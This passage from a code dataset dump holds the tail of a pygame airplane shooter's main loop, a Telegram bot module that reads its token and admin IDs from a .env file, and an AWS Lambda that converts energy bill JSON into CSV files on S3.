10):\n # 与单枪统一成一个列表,这样就能重复使用代码\n bullets = bullet2\n bullet_sound.play()\n # 检测到双枪变量为True后,调用reset方法使子弹的active为True\n bullets[bullet2_index].reset((me.rect.centerx - 33, me.rect.centery - 50))\n bullets[bullet2_index + 1].reset((me.rect.centerx + 30, me.rect.centery - 50))\n bullet2_index = (bullet2_index + 2) % BULLET2_NUM\n else:\n # 60帧里生成4子弹\n if not(delay % 10):\n # 与双枪统一成一个列表,这样就能重复使用代码\n bullets = bullet1\n bullet_sound.play()\n # 每过10帧重置一次子弹的位置,这样的话60帧里就能够画四个子弹了\n bullets[bullet1_index].reset(me.rect.midtop) # 传入自己飞机的中间位置,子弹就会随飞机移动\n bullet1_index = (bullet1_index + 1) % BULLET1_NUM\n\n # 绘制敌机前检查是否被子弹击中\n for b in bullets:\n if b.active:\n b.move()\n if is_double_bullet:\n screen.blit(b.image, b.rect)\n else:\n screen.blit(b.image, b.rect)\n # 子弹存活时检测是否与敌机碰撞 放入列表中\n enemy_hit = pygame.sprite.spritecollide(b, enemies, False, pygame.sprite.collide_mask)\n # 遍历这儿列表 如果有碰撞的对象,则将其active设置为False\n # 先判断一下是否有数据 有的话才遍历,这样节省资源\n if enemy_hit:\n # 子弹毁灭\n b.active = False\n # 敌机毁灭\n for e in enemy_hit:\n # 因为加入了中飞机大飞机的血量 所以这儿判断遍历出来的对象是否时大飞机 或 中飞机 是就在击中时减少一滴血\n if (e in mid_enemies) or (e in big_enemies):\n e.hit = True\n e.energy -= 1\n # 血量打为零后 设置飞机被击毁\n if e.energy == 0:\n e.active = False\n else:\n e.active = False\n\n\n # 首先绘制大飞机再绘制中 最后绘制小飞机,因为先绘制小,大会将其覆盖\n for each in big_enemies:\n # 检查是否时存活状态\n if each.active:\n # 遍历出每一个调用移动方法\n each.move()\n # 飞机被击中时的那会儿绘制特效图片 正常时绘制正常图片\n if each.hit:\n screen.blit(each.image_hit, each.rect)\n each.hit = False\n else:\n if 
switch_image:\n screen.blit(each.image1, each.rect)\n else:\n screen.blit(each.image2, each.rect)\n # 绘制完飞机之后绘制血量\n # 先绘制一个黑色的血槽底槽 绘制在飞机限定矩形的上方5个像素处\n pygame.draw.line(screen,(0,0,0),(each.rect.left,each.rect.top - 5),(each.rect.right, each.rect.top - 5),2)\n # 计算飞机剩余血量\n energy_remain = each.energy / enemy.BigEnemy.energy\n # 剩余血量小于20% 时绘制红色的血量\n if energy_remain > 0.2:\n energy_color = green\n else:\n energy_color = red\n # 将剩余血量绘制在黑色底槽上方\n # 剩余血量绘制开始的位置 (each.rect.left, each.rect.top - 5)\n # 剩余血量绘制结束的位置 (each.rect.left + each.rect.width * enemgy_remain)\n # 结束位置:将限定矩形的width分为20份(大飞机血量)\n pygame.draw.line(screen, energy_color, (each.rect.left, each.rect.top - 5),(each.rect.left + each.rect.width * energy_remain, each.rect.top - 5))\n\n # 大飞机即将出现时播放音效 当下部等于50时播放,不能写为大于或者小于,因为写成这样的话会每一帧都播放一次,当毁灭后音效停止\n if each.rect.bottom == -50:\n enemy3_fly_sound.play(-1)\n if each.rect.top == height:\n enemy3_fly_sound.stop()\n else:\n # 毁灭 被摧毁时或相撞时\n # 每隔三帧 播放一帧毁灭的画面,播放完毕之后reset()\n if not(delay % 3):\n # 这儿加e3_destroy_index == 0 是因为主程序每循环一次,不加判断的话,就会再次播放音效详见下面的else\n if e3_destroy_index == 0:\n enemy3_down_sound.play()\n screen.blit(each.destroy_images[e3_destroy_index], each.rect)\n # 下面e3_destroy_index产生的有1,2,3,4,5,0,1,2.....\n e3_destroy_index = (e3_destroy_index + 1) % 6\n if e3_destroy_index == 0:\n enemy3_fly_sound.stop()\n score += 10000\n each.reset()\n\n for each in mid_enemies:\n if each.active:\n # 遍历出每一个调用移动方法\n each.move()\n # 子弹击中飞机时的那会儿绘制特效图片 正常时绘制正常图片\n if each.hit:\n screen.blit(each.image_hit, each.rect)\n each.hit = False\n else:\n screen.blit(each.image, each.rect)\n\n # 绘制完飞机之后绘制血量\n # 先绘制一个黑色的血槽底槽\n pygame.draw.line(screen, (0,0,0),(each.rect.left, each.rect.top - 5), (each.rect.right, each.rect.top - 5), 2)\n\n energy_remain = each.energy / enemy.MidEnemy.energy\n if energy_remain > 0.2:\n energy_color = green\n else:\n energy_color = red\n pygame.draw.line(screen, energy_color, (each.rect.left, each.rect.top - 5), (each.rect.left + each.rect.width * energy_remain, each.rect.top - 5))\n\n else:\n # 毁灭 被摧毁时或相撞时\n # 每隔三帧 播放一帧毁灭的画面,播放完毕之后reset()\n if not(delay % 3):\n if e2_destroy_index == 0:\n enemy2_down_sound.play()\n screen.blit(each.destroy_images[e2_destroy_index], each.rect)\n # 下面e2_destroy_index产生的有1,2,3,4,5,0,1,2.....\n e2_destroy_index = (e2_destroy_index + 1) % 4\n if e2_destroy_index == 0:\n score += 5000\n each.reset()\n for each in small_enemies:\n if each.active:\n # 遍历出每一个调用移动方法\n each.move()\n screen.blit(each.image, each.rect)\n else:\n # 毁灭 被摧毁时或相撞时\n # 每隔三帧 播放一帧毁灭的画面,播放完毕之后reset() 99 96 93 90 86\n if not(delay % 3):\n if e1_destroy_index == 0:\n enemy1_down_sound.play()\n screen.blit(each.destroy_images[e1_destroy_index], each.rect)\n # 下面e1_destroy_index产生的有1,2,3,4,5,0,1,2.....\n e1_destroy_index = (e1_destroy_index + 1) % 4\n if e1_destroy_index == 0:\n score += 1000\n each.reset()\n\n # 在绘制我方飞机前检测是否被撞击\n # me与enemies列表中的精灵发生碰撞则返回enemies 中碰撞的精灵,我们用一个列表来接收\n # False 表示碰撞后删除对象,第四个参数表示指定检测碰撞的函数\n enemies_down = pygame.sprite.spritecollide(me, enemies, False, pygame.sprite.collide_mask)\n # 如果存在相撞的对象\n if enemies_down and not me.invincible:\n # 则自方遇难\n me.active = False\n # 则将所有的敌机状态改为遇难状态\n for e in enemies_down:\n e.active = False\n\n\n # 绘制我方飞机\n if me.active:\n if switch_image:\n screen.blit(me.image1, me.rect)\n else:\n screen.blit(me.image2, me.rect)\n else:\n # 毁灭 被摧毁时或相撞时\n # 每隔三帧 播放一帧毁灭的画面,播放完毕之后reset()\n if not(delay % 3):\n if me_destroy_index == 0:\n me_down_sound.play()\n screen.blit(each.destroy_images[me_destroy_index], each.rect)\n # 
下面e3_destroy_index产生的有1,2,3,4,5,0,1,2.....\n me_destroy_index = (me_destroy_index + 1) % 4\n if me_destroy_index == 0:\n me.reset()\n life_num -= 1\n pygame.time.set_timer(Invincible_Event, 3 * 1000)\n print('凉了一次!')\n\n # 绘制炸弹在里面,这样暂停的时候我们就看不到全屏炸弹的数量\n screen.blit(bomb_image, bomb_rect)\n # 绘制炸弹个数\n bomb_text = bomd_font.render('X %s' % str(bomb_num), True, white)\n screen.blit(bomb_text, (bomb_rect.width + 20, height - bomb_rect.height))\n\n # 绘制我方飞机后绘制分数至窗口\n # pygame中操做的都是surface对象,string文本.render(字符串对象,是否开启抗锯齿,字体颜色,字体背景色) 能将字符串转化为surface对象\n score_text = score_font.render('Score: %s' % str(score), True, white)\n # 绘制分数至窗口\n screen.blit(score_text, (10, 5))\n # 将暂停继续的图片绘制出来\n screen.blit(paused_image, paused_rect)\n\n\n # 检测到我方飞机生命为0时\n if life_num:\n # 绘制我方飞机的生命数量\n for m in range(life_num):\n screen.blit(life_image, (width - life_image_rect.width * (m + 1) - 10, height - life_image_rect.height))\n # 绘制游戏结束画面 我放飞机生命用尽\n elif life_num == 0:\n # 停止音乐\n pygame.mixer.music.stop()\n # 停止音效\n pygame.mixer.stop()\n # 停止补给\n pygame.time.set_timer(Supply_EVENT, 0)\n # 读取历史最高得分 recorded是为了阻止重复打开和关闭文件\n if not recorded:\n recorded = True\n try:\n with open('record.txt', 'r') as f:\n pass\n #record_score = f.read()\n\n # 如果记录的文件被用户删除时触发这儿\n except FileNotFoundError:\n with open('record.txt', 'w') as f:\n f.write(str(score))\n finally:\n with open('record.txt', 'r') as f:\n record_score = f.read()\n # 如果这次得分高于历史得分\n if int(score) > int(record_score):\n with open('record.txt', 'w') as f:\n f.write(str(score))\n # 最后读取一次存在文件里的分数\n with open('record.txt', 'r') as f:\n best_score = f.read()\n '''\n with open('record.txt', 'r') as f:\n record_score = f.read()\n #如果这次得分高于历史得分\n if score > record_score:\n with open('record.txt', 'wr') as f:\n f.write(str(score))'''\n # 绘制结束画面\n record_score_text = score_font.render(\"Best: %d\" % int(best_score), True, white)\n screen.blit(record_score_text, (50, 50))\n\n # 本局游戏结束时的分数 上面显示文字 下面分数\n gameover_text1 = gameover_font.render(\"Your score\", True, white)\n gameover_text1_rect = gameover_text1.get_rect()\n gameover_text1_rect.left, gameover_text1_rect.top = (width - gameover_text1_rect.width) // 2, height // 3\n screen.blit(gameover_text1, gameover_text1_rect)\n # 本局游戏结束时的分数 下面显示分数 分数转化为str 类型\n gameover_text2 = gameover_font.render(str(score), True, white)\n gameover_text2_rect = gameover_text2.get_rect()\n gameover_text2_rect.left, gameover_text2_rect.top = (width - gameover_text2_rect.width) // 2,\\\n gameover_text1_rect.bottom + 10\n screen.blit(gameover_text2, gameover_text2_rect)\n\n # 绘制结束时的两个按钮 第一个\n again_rect.left, again_rect.top = (width - again_rect.width) // 2, gameover_text2_rect.bottom + 50 # 相对定位(相对本局结束分数的位置)\n screen.blit(again_image, again_rect)\n # 第二个\n gameover_rect.left, gameover_rect.top = (width - gameover_rect.width) // 2, again_rect.bottom + 10 # 相对上一个按钮的定位\n screen.blit(gameover_image, gameover_rect)\n\n # 游戏结束时检测用户鼠标是否点击了上面的按钮\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1 and again_rect.collidepoint(event.pos):\n main()\n if event.button == 1 and gameover_rect.collidepoint(event.pos):\n pygame.quit()\n sys.exit()\n\n\n\n # 减帧方法\n # 能被5整除时才切换变量的值,从而达到限制帧率 延迟切换飞机突突突图片的效果\n if not(delay % 5):\n switch_image = not switch_image\n # 每一帧减一,因为我们这儿是一秒六十帧,所以一秒减少60,\n # 那么一秒钟就有12 个数字能被5 整除,所以就达到了限制帧率的目的(12帧)\n delay -= 1\n if not delay:\n delay = 100\n\n\n # screen只是绘制至了内存中,需要pygame.display.flip() 到显示器\n pygame.display.flip()\n # 定义游戏帧率\n clock.tick(60)\nif __name__ == '__main__':\n try:\n main()\n except SystemExit:\n # 
点击×退出的异常不用关心\n pass\n except:\n # 其它异常时打印出错误之处后退出pygame模块, 打印出来后停留: input()\n traceback.print_exc()\n pygame.quit()\n input()\n","repo_name":"BJL0603/Company_temp","sub_path":"Air_War/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30655,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12888562796","text":"\"\"\"\nModule for reading values from environment variables in .env files\nContains Environment class, which performs reading of values and env - object of Environment class\n\nExample:\n Import an instance of the class into the desired module:\n from tgbot.utils.environment import env\n\n Get the values from the environment variables:\n bot_token: str = env.get_token_or_exit()\n bot_admins: tuple[int, ...] = env.get_admin_ids_or_exit()\n\"\"\"\n\nfrom os import path\nfrom sys import exit as sys_exit\n\nfrom environs import Env, EnvError\n\nfrom tgbot.config import ENV_FILE\nfrom tgbot.utils.logger import logger\n\n\nclass Environment:\n \"\"\"Reads variables from the .env file\"\"\"\n\n def __init__(self, path_to_env_file: str) -> None:\n \"\"\"\n Initializing a class or terminating a program if no .env file is found\n\n :param path_to_env_file: path to .env file with environment variables\n :type path_to_env_file: str\n \"\"\"\n if not path.exists(path=path_to_env_file):\n logger.critical(\"The .env file was not found in the path %s\", path_to_env_file)\n sys_exit(1)\n self._env: Env = Env()\n self._env.read_env(path=path_to_env_file, recurse=False)\n\n def get_token_or_exit(self) -> str:\n \"\"\"\n Returns the bot token or terminates the program in case of an error\n\n :return: bot token\n :rtype: str\n \"\"\"\n try:\n return str(self._env.str(\"BOT_TOKEN\"))\n except EnvError as exc:\n logger.critical(\"BOT_TOKEN not found: %s\", repr(exc))\n sys_exit(repr(exc))\n\n def get_admin_ids(self) -> tuple[int, ...] | None:\n \"\"\"\n Returns administrator IDs or None if ADMINS is not set in the .env file\n\n :return: admin ids\n :rtype: tuple[int, ...] 
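main.py above arms Supply_EVENT, Double_Bullet_Event and Invincible_Event with pygame.time.set_timer and disarms them by re-arming with interval 0. A minimal standalone sketch of that pattern (the TICK name, window size and interval are my choices):

import pygame

pygame.init()
screen = pygame.display.set_mode((100, 100))
TICK = pygame.USEREVENT           # first free user-defined event id
pygame.time.set_timer(TICK, 250)  # post a TICK event every 250 ms

ticks = 0
while ticks < 3:
    for event in pygame.event.get():
        if event.type == TICK:
            ticks += 1
pygame.time.set_timer(TICK, 0)    # interval 0 cancels the timer
pygame.quit()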
+{"seq_id":"12888562796","text":"\"\"\"\nModule for reading values from environment variables in .env files\nContains Environment class, which performs reading of values and env - object of Environment class\n\nExample:\n    Import an instance of the class into the desired module:\n        from tgbot.utils.environment import env\n\n    Get the values from the environment variables:\n        bot_token: str = env.get_token_or_exit()\n        bot_admins: tuple[int, ...] | None = env.get_admin_ids()\n\"\"\"\n\nfrom os import path\nfrom sys import exit as sys_exit\n\nfrom environs import Env, EnvError\n\nfrom tgbot.config import ENV_FILE\nfrom tgbot.utils.logger import logger\n\n\nclass Environment:\n    \"\"\"Reads variables from the .env file\"\"\"\n\n    def __init__(self, path_to_env_file: str) -> None:\n        \"\"\"\n        Initializing a class or terminating a program if no .env file is found\n\n        :param path_to_env_file: path to .env file with environment variables\n        :type path_to_env_file: str\n        \"\"\"\n        if not path.exists(path=path_to_env_file):\n            logger.critical(\"The .env file was not found in the path %s\", path_to_env_file)\n            sys_exit(1)\n        self._env: Env = Env()\n        self._env.read_env(path=path_to_env_file, recurse=False)\n\n    def get_token_or_exit(self) -> str:\n        \"\"\"\n        Returns the bot token or terminates the program in case of an error\n\n        :return: bot token\n        :rtype: str\n        \"\"\"\n        try:\n            return str(self._env.str(\"BOT_TOKEN\"))\n        except EnvError as exc:\n            logger.critical(\"BOT_TOKEN not found: %s\", repr(exc))\n            sys_exit(repr(exc))\n\n    def get_admin_ids(self) -> tuple[int, ...] | None:\n        \"\"\"\n        Returns administrator IDs or None if ADMINS is not set in the .env file\n\n        :return: admin ids\n        :rtype: tuple[int, ...] | None\n        \"\"\"\n        try:\n            return tuple(map(int, self._env.list(\"ADMINS\")))\n        except (EnvError, ValueError) as exc:\n            logger.error(\"ADMINS ids not found: %s\", repr(exc))\n            return None\n\n\nenv: Environment = Environment(path_to_env_file=ENV_FILE)\n","repo_name":"rin-gil/python-telegram-bot-template","sub_path":"src/tgbot/utils/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"33800832536","text":"import json\nimport os\nimport re\nfrom io import StringIO\nfrom urllib.parse import unquote_plus\nimport boto3\nimport pandas as pd\n\ns3 = boto3.resource('s3')\ncsvBuffer = StringIO()\n\noutputFolder = os.environ.get('OUTPUT_FOLDER')\nfailedFolder = os.environ.get('FAILED_FOLDER')\ntodoFolder = os.environ.get('TODO_FOLDER')\ncustomer01 = os.environ.get('CUSTOMER_01')\n\n\ndef Validate_elec(Datafile, bucket, customer):\n    df1 = Datafile\n    df2 = pd.DataFrame()\n\n    df2['Code'] = df1['Nmi']\n    df2['Invoice_Number'] = df1['InvoiceNumber']\n    df2['Cost'] = df1['TotalChargeIncExtra']\n    df2['Date'] = df1['EndDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n    df2['Date_TaxPoint'] = df1['IssueDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n    df2['Date_Previous'] = df1['StartDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n\n    # Capturing VAT\n    All_VAT_list = []\n    for index, row in df1.iterrows():\n        VAT_list = []  # reset per bill; otherwise the totals accumulate across rows\n        for vatitem in range(len(row['ExtraCharges'])):\n            VAT1 = row['ExtraCharges'][vatitem]\n            if VAT1['Name'] == 'VAT':\n                VAT_list.append(VAT1['Cost'])\n        BillVAT = sum(VAT_list)\n        All_VAT_list.append(BillVAT)\n    df2['VAT'] = pd.DataFrame(All_VAT_list)\n\n    # Capturing Standing Charges\n    Standingcharge_list = []\n    Standingchargerate_list = []\n    substring = \"Standing Charge\"\n    for index, row in df1.iterrows():\n        stchrge1 = row['Periods']\n\n        if len(stchrge1) > 0:\n            for schargenum in range(len(stchrge1)):\n                try:\n                    stchrgeX = stchrge1[schargenum]\n                    stcharge2 = stchrgeX['EnergyService']\n\n                    for stnum in range(len(stcharge2)):\n                        stchrge3 = stcharge2[stnum]\n                        fullstring = stchrge3['Comment']\n\n                        if (stchrge3['Name'] == 'Service') & (substring in fullstring):\n                            Standingcharge_list.append(stchrge3['Cost'])\n                            Standingchargerate_list.append(stchrge3['Price'])\n                except:\n                    print('No Standing charges')\n    try:\n        df2['Standing_Charge'] = pd.DataFrame(Standingcharge_list)\n        df2['Standing_Charge_Rate'] = pd.DataFrame(Standingchargerate_list)\n    except:\n        df2['Standing_Charge'] = ''\n        df2['Standing_Charge_Rate'] = ''\n\n    ###########################################################################\n    # capturing KVA charges\n    ###########################################################################\n    KVA_Cost_list = []\n    KVA_costrate_list = []\n    KVA_units = []\n\n    for index, row in df1.iterrows():\n        KVA1 = row['Periods']\n\n        if len(KVA1) > 0:\n            for kvaitem in range(len(KVA1)):\n                try:\n                    KVAX = KVA1[kvaitem]\n                    KVA2 = KVAX['Capacities']\n\n                    for kvanum in range(len(KVA2)):\n                        KVA3 = KVA2[kvanum]\n                        if KVA3['Name'] == 'DUoS':\n                            KVA_Cost_list.append(KVA3['Cost'])\n                            KVA_units.append(KVA3['Quantity'])\n                            KVA_costrate_list.append(KVA3['Price'])\n                except:\n                    print('No KVA charges')\n    try:\n        df2['kVA'] = pd.DataFrame(KVA_units)\n        df2['kVA_Cost_Rate'] = pd.DataFrame(KVA_costrate_list)\n        df2['kVA_Cost'] = pd.DataFrame(KVA_Cost_list)\n    except:\n        df2['kVA'] = ''\n        df2['kVA_Cost_Rate'] = ''\n        df2['kVA_Cost'] = ''\n\n    ###########################################################################\n    # 
Capturing Peak Previous and Current Meter Reads + Estimate\n ###########################################################################\n M1_Previousread_list = []\n M1_CurrentRead_list = []\n M1_CurrentDate_list = []\n M1_PreviousDate_list = []\n M1_CurrentReadType_list = []\n M2_Previousread_list = []\n M2_PreviousDate_list = []\n M2_CurrentRead_list = []\n M2_CurrentDate_list = []\n\n for index, row in df1.iterrows():\n Meters1 = row['Meters']\n meterno = len(Meters1)\n\n if meterno == 0:\n M1_Previousread_list.append('')\n M1_PreviousDate_list.append('')\n M1_CurrentRead_list.append('')\n M1_CurrentDate_list.append('')\n M1_CurrentReadType_list.append('A')\n M2_Previousread_list.append('')\n M2_PreviousDate_list.append('')\n M2_CurrentRead_list.append('')\n M2_CurrentDate_list.append('')\n elif meterno == 1:\n M1_Previousread_list.append(Meters1[0]['PreviousRead'])\n M1_CurrentRead_list.append(Meters1[0]['CurrentRead'])\n M1_CurrentDate_list.append(Meters1[0]['CurrentReadDate'])\n if Meters1[0]['CurrentReadType'] == 'Actual':\n M1_CurrentReadType_list.append('A')\n elif Meters1[0]['CurrentReadType'] == 'Estimated':\n M1_CurrentReadType_list.append('E')\n else:\n M1_CurrentReadType_list.append('A')\n\n M2_Previousread_list.append('')\n M2_PreviousDate_list.append('')\n M2_CurrentRead_list.append('')\n M2_CurrentDate_list.append('')\n\n elif meterno == 2:\n M1_Previousread_list.append(Meters1[0]['PreviousRead'])\n M1_CurrentRead_list.append(Meters1[0]['CurrentRead'])\n M1_CurrentDate_list.append(Meters1[0]['CurrentReadDate'])\n if Meters1[0]['CurrentReadType'] == 'Actual':\n M1_CurrentReadType_list.append('A')\n elif Meters1[0]['CurrentReadType'] == 'Estimated':\n M1_CurrentReadType_list.append('E')\n else:\n M1_CurrentReadType_list.append('A')\n\n M2_Previousread_list.append(Meters1[1]['PreviousRead'])\n M2_PreviousDate_list.append(Meters1[1]['PreviousReadDate'])\n M2_CurrentRead_list.append(Meters1[1]['CurrentRead'])\n M2_CurrentDate_list.append(Meters1[1]['CurrentReadDate'])\n\n df2['M1_Present'] = pd.DataFrame(M1_CurrentRead_list)\n df2['M1_Previous'] = pd.DataFrame(M1_Previousread_list)\n df2['M1_Read_Date'] = pd.DataFrame(M1_CurrentDate_list)\n df2['Estimate'] = pd.DataFrame(M1_CurrentReadType_list)\n df2['M2_Present'] = pd.DataFrame(M2_CurrentRead_list)\n df2['M2_Previous'] = pd.DataFrame(M2_Previousread_list)\n df2['M2_Read_Date'] = pd.DataFrame(M2_CurrentDate_list)\n\n ###########################################################################\n # Capturing Peak charges\n ###########################################################################\n PeakChg_list = []\n PeakQty_list = []\n PeakRate_list = []\n OffPeakChg_list = []\n OffPeakQty_list = []\n OffPeakRate_list = []\n\n for index, row in df1.iterrows():\n peak1 = row['Periods']\n\n if len(peak1) > 0:\n for energyitem in range(len(peak1)):\n try:\n peakx = peak1[energyitem]\n peak2 = peakx['EnergyLineItems']\n\n for finalpeak in range(len(peak2)):\n peak3 = peak2[finalpeak]\n if (peak3['Name'] == 'Peak') | (peak3['Name'] == 'Energy'):\n PeakChg_list.append(peak3['Cost'])\n PeakQty_list.append(peak3['Quantity'])\n PeakRate_list.append(peak3['Price'])\n elif peak3['Name'] == 'OffPeak':\n OffPeakChg_list.append(peak3['Cost'])\n OffPeakQty_list.append(peak3['Quantity'])\n OffPeakRate_list.append(peak3['Price'])\n except:\n print(\"No energy items\")\n try:\n df2['M1_Units'] = pd.DataFrame(PeakQty_list)\n df2['M1_Cost_Rate'] = pd.DataFrame(PeakRate_list)\n df2['M1_Cost'] = pd.DataFrame(PeakChg_list)\n except:\n 
df2['M1_Units'] = ''\n df2['M1_Cost_Rate'] = ''\n df2['M1_Cost'] = ''\n try:\n df2['M2_Units'] = pd.DataFrame(OffPeakQty_list)\n df2['M2_Cost_Rate'] = pd.DataFrame(PeakRate_list)\n df2['M2_Cost'] = pd.DataFrame(OffPeakChg_list)\n except:\n df2['M2_Units'] = ''\n df2['M2_Cost_Rate'] = ''\n df2['M2_Cost'] = ''\n\n ############################################################################\n\n finaldf = df2[\n ['Code', 'Date', 'Invoice_Number', 'Date_TaxPoint', 'Date_Previous', 'M1_Units', 'M1_Cost_Rate', 'M1_Cost',\n 'M2_Units', 'M2_Cost_Rate', 'M2_Cost', 'Standing_Charge', 'Standing_Charge_Rate', 'kVA', 'kVA_Cost',\n 'kVA_Cost_Rate', 'VAT', 'Cost', 'Estimate', 'M1_Present', 'M1_Previous', 'M2_Present',\n 'M2_Previous', 'M1_Read_Date', 'M2_Read_Date']]\n\n # Writing into a file\n address = re.sub('\\W+', '', df1['Address'].iloc[0])\n File_invoicenumber = re.sub('\\W+', '', df1['InvoiceNumber'].iloc[0])\n filename = address[0:21] + \"-\" + str(df1['Nmi'].iloc[0]) + \"-\" + str(File_invoicenumber)\n finaldf.to_csv(csvBuffer)\n s3.Object(bucket, customer + '/' + outputFolder + '/' + filename + \".csv\").put(Body=csvBuffer.getvalue())\n\n\ndef Validate_gas(Datafile, bucket, customer):\n dfgas1 = Datafile\n dfgas2 = pd.DataFrame()\n\n dfgas2['Code'] = dfgas1['Nmi']\n dfgas2['Invoice_Number'] = dfgas1['InvoiceNumber']\n dfgas2['Cost'] = dfgas1['TotalChargeIncExtra']\n dfgas2['Date'] = dfgas1['EndDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n dfgas2['Date_TaxPoint'] = dfgas1['IssueDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n dfgas2['Date_Previous'] = dfgas1['StartDate'].apply(pd.to_datetime, format='%Y-%m-%d')\n\n #################################################################################\n # Capturing VAT - GAS\n #################################################################################\n All_VAT_list = []\n VAT_list = []\n for index, row in dfgas1.iterrows():\n for vatitem in range(len(row['ExtraCharges'])):\n VAT1 = row['ExtraCharges'][vatitem]\n if (VAT1['Name'] == 'VAT'):\n VAT_list.append(VAT1['Cost'])\n BillVAT = sum(VAT_list)\n All_VAT_list.append(BillVAT)\n dfgas2['VAT'] = pd.DataFrame(All_VAT_list)\n\n #################################################################################\n # Capturing standing charge\n #################################################################################\n\n Standingcharge_list = []\n Standingchargerate_list = []\n substring = \"Standing Charge\"\n for index, row in dfgas1.iterrows():\n stchrge1 = row['Periods']\n\n if len(stchrge1) > 0:\n for schargenum in range(len(stchrge1)):\n try:\n stchrgeX = stchrge1[schargenum]\n stcharge2 = stchrgeX['EnergyService']\n\n for stnum in range(len(stcharge2)):\n stchrge3 = stcharge2[stnum]\n fullstring = stchrge3['Comment']\n\n if ((stchrge3['Name'] == 'Service') & (substring in fullstring)):\n Standingcharge_list.append(stchrge3['Cost'])\n Standingchargerate_list.append(stchrge3['Price'])\n except:\n print('No Standing charges')\n try:\n dfgas2['Standing_Charge'] = pd.DataFrame(Standingcharge_list)\n dfgas2['Standing_Charge_Rate'] = pd.DataFrame(Standingchargerate_list)\n except:\n dfgas2['Standing_Charge'] = ''\n dfgas2['Standing_Charge_Rate'] = ''\n\n #################################################################################\n # Capturing Peak Previous and Current Meter Reads + Estimate\n #################################################################################\n M1_Previousread_list = []\n M1_CurrentRead_list = []\n M1_CurrentDate_list = []\n M1_PreviousDate_list = []\n 
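    # Gas bills carry a single meter, so only the M1_* read columns are
    # collected below, together with the correction factor and calorific value.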
M1_CurrentReadType_list = []\n M1_CorrFact_list = []\n M1_CalVal_list = []\n\n for index, row in dfgas1.iterrows():\n Meters1 = row['Meters']\n meterno = len(Meters1)\n\n if meterno == 0:\n M1_Previousread_list.append('')\n M1_PreviousDate_list.append('')\n M1_CurrentRead_list.append('')\n M1_CurrentDate_list.append('')\n M1_CurrentReadType_list.append('A')\n\n elif meterno == 1:\n M1_Previousread_list.append(Meters1[0]['PreviousRead'])\n M1_CurrentRead_list.append(Meters1[0]['CurrentRead'])\n M1_CurrentDate_list.append(Meters1[0]['CurrentReadDate'])\n M1_CorrFact_list.append(Meters1[0]['CorrectionFactor'])\n M1_CalVal_list.append(Meters1[0]['CalorificValue'])\n\n if Meters1[0]['CurrentReadType'] == 'Actual':\n M1_CurrentReadType_list.append('A')\n elif Meters1[0]['CurrentReadType'] == 'Estimated':\n M1_CurrentReadType_list.append('E')\n else:\n M1_CurrentReadType_list.append('A')\n\n dfgas2['M1_Present'] = pd.DataFrame(M1_CurrentRead_list)\n dfgas2['M1_Previous'] = pd.DataFrame(M1_Previousread_list)\n dfgas2['M1_Read_Date'] = pd.DataFrame(M1_CurrentDate_list)\n dfgas2['Estimate'] = pd.DataFrame(M1_CurrentReadType_list)\n dfgas2['M1_Factor_1'] = pd.DataFrame(M1_CorrFact_list)\n dfgas2['M1_Factor_2'] = pd.DataFrame(M1_CalVal_list)\n\n #################################################################################\n # Capturing Gas units and charges\n #################################################################################\n\n All_units_list = []\n All_charges_list = []\n Gas_costrate = []\n Gas_units_list = []\n Gas_charges_list = []\n\n for index, row in dfgas1.iterrows():\n energycharges1 = row['Periods']\n\n if len(energycharges1) > 0:\n for echargenum in range(len(energycharges1)):\n echargeX = energycharges1[echargenum]\n echarge2 = echargeX['EnergyLineItems']\n\n for enum1 in range(len(echarge2)):\n echarge3 = echarge2[enum1]\n\n if echarge3['Name'] == 'Energy':\n Gas_units_list.append(echarge3['Quantity'])\n Gas_charges_list.append(echarge3['Cost'])\n gascostrate = echarge3['Price']\n\n All_units_list.append(sum(Gas_units_list))\n All_charges_list.append(sum(Gas_charges_list))\n Gas_costrate.append(gascostrate)\n\n dfgas2['M1_Units'] = pd.DataFrame(All_units_list)\n dfgas2['M1_Cost'] = pd.DataFrame(All_charges_list)\n dfgas2['M1_Cost_Rate'] = pd.DataFrame(Gas_costrate)\n\n ###################################################################################\n\n dfgas2['kWh_Factor'] = 3.6\n\n finaldf = dfgas2[['Code', 'Date', 'Invoice_Number', 'Date_TaxPoint', 'Date_Previous', 'M1_Units',\n 'M1_Cost_Rate', 'M1_Cost', 'Standing_Charge', 'Standing_Charge_Rate', 'VAT', 'Cost',\n 'Estimate', 'M1_Present', 'M1_Previous', 'M1_Factor_1', 'M1_Factor_2', 'kWh_Factor',\n 'M1_Read_Date']]\n\n # Writing into a file\n address = re.sub('\\W+', '', dfgas1['Address'].iloc[0])\n File_invoicenumber = re.sub('\\W+', '', dfgas1['InvoiceNumber'].iloc[0])\n filename = address[0:21] + \"-\" + str(dfgas1['Nmi'].iloc[0]) + \"-\" + str(File_invoicenumber)\n finaldf.to_csv(csvBuffer)\n s3.Object(bucket, customer + '/' + outputFolder + '/' + filename + \".csv\").put(Body=csvBuffer.getvalue())\n\n\ndef lambda_handler(event, context):\n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = unquote_plus(record['s3']['object']['key'])\n customer = key.split(\"/\")[0]\n folder = key.split(\"/\")[1]\n content_object = s3.Object(bucket, key)\n\n if folder == todoFolder and customer == customer01:\n try:\n file_content = content_object.get()['Body'].read().decode('utf-8')\n Jsondata 
